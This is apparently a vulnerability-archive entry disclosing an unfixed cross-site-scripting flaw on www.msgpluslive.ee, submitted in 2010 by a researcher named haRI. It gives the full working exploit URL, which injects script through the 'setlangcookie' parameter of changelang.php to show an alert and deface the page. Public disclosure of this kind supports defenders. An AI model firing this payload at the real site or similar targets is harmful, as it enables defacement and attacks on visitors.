Security researcher haRI, has submitted on 22/06/2010 a cross-site-scripting (XSS) vulnerability affecting www.msgpluslive.ee, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 22/06/2010 |
Date published: 21/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: haRI |
Domain: www.msgpluslive.ee |
Category: XSS |
Pagerank: 0 |
URL: http://www.msgpluslive.ee/changelang.php?setlangcookie=">%3Cscript%3Ealert%28%27LIVE+IS+HACKED+BY+ha RI%27%29%3C%2fscript%3E%3Cbody+bgcolor%3D%22black%22%3E%3CCENTER%3E%3C%2FCENTER%3E%3CMARQUEE%3E%3CCE NTER%3E+%3Cfont+size%3D%2244%22+color%3D%22red%22%3ETHE+LIVE+%20is+Xss3d+BY+haRI(topsecure.net)%3C%2 Ffont%3E%3C%2FCENTER%3E%3C%2FMARQUEE%3E%3CBODY&site=Default&btnG.x=0&btnG.y=0&btnG=Search&sort=date% 3AD%3AL%3Ad1&output=xml_no_dtd&ie=UTF-8&client=default_frontend&btnG.y=0&btnG.y=0&btnG.x=0&btnG.x=0& oe=UTF-8&proxystylesheet=default_frontend&lang=th&redirect=www.msgpluslive.net%2Ffeatures%2F%3Flang% 3Dth |
Click here to view the mirror
|
|
|